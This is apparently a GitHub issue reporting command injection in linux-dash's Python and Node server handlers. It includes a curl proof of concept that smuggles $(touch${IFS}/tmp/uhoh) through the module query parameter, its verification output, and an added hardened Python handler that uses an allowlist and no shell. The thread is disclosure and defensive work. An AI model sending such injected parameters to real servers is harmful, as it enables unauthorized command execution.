injection vulnerabilities #498

Open
jefimm opened this issue Sep 10, 2020 · 2 comments

jefimm commented Sep 10, 2020

https://github.com/afaqurk/linux-dash/blob/master/app/server/index.js#L76
and
https://github.com/afaqurk/linux-dash/blob/master/app/server/index.py#L30
are lacking escaping and are vulnerable to command injection

@calderonth

How to exploit the Python server:
python index.py --port 8080

Trigger the command injection:

curl -v 'http://localhost:8080/server/?module=$(touch${IFS}/tmp/uhoh)' 
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET /server/?module=$(touch$IFS/tmp/uhoh) HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: BaseHTTP/0.3 Python/2.7.18
< Date: Tue, 20 Apr 2021 15:09:56 GMT
< Content-type: text/html
< 
{\"success\":false,\"status\":\"Invalid module\"}

Verify:

ls -ltr /tmp/uhoh                                         
-rw-rw-r-- 1 thomas thomas 0 Apr 20 16:09 /tmp/uhoh
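
A hardened way to handle the `module` query parameter shown in the request above, as an added example that is not part of the original thread and not linux-dash's own code. The allowlist pattern, the function names and the stand-in script (a Python one-liner that echoes its argument) are assumptions made so the example runs offline.

```python
import re
import subprocess
import sys
from urllib.parse import parse_qs

# Assumption: module names are short lowercase identifiers such as "cpu_info".
MODULE_RE = re.compile(r"[a-z][a-z0-9_]{0,63}")

# Hypothetical stand-in for the server's module script: echoes its first argument.
STAND_IN_SCRIPT = [sys.executable, "-c",
                   "import sys; sys.stdout.write(sys.argv[1])"]


def parse_module(query_string):
    """Return the validated module name, or None if absent, repeated or malformed."""
    values = parse_qs(query_string, keep_blank_values=True).get("module", [])
    if len(values) != 1 or not MODULE_RE.fullmatch(values[0]):
        return None
    return values[0]


def run_argv(module, script=STAND_IN_SCRIPT):
    """Run the script with the module as a single argv element.

    The command is a list and shell=True is never used, so no shell parses
    the value: $(...), ${IFS}, ';' and backticks stay literal bytes.
    """
    result = subprocess.run(script + [module], stdout=subprocess.PIPE,
                            timeout=10, check=False)
    return result.stdout.decode()


def handle(query_string):
    """Validate first, then execute without a shell (defence in depth)."""
    module = parse_module(query_string)
    if module is None:
        return 400, '{"success":false,"status":"Invalid module"}'
    return 200, run_argv(module)


if __name__ == "__main__":
    print(handle("module=cpu_info"))
    # The request from the report above is rejected before anything is executed.
    print(handle("module=$(touch${IFS}/tmp/uhoh)"))
```

Either control alone blocks the request in the report; using both means a later loosening of the allowlist still cannot reach a shell.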

@milansimek

@tariqbuilds Maybe you should archive the project or put a warning in the readme as long as this isn't patched?
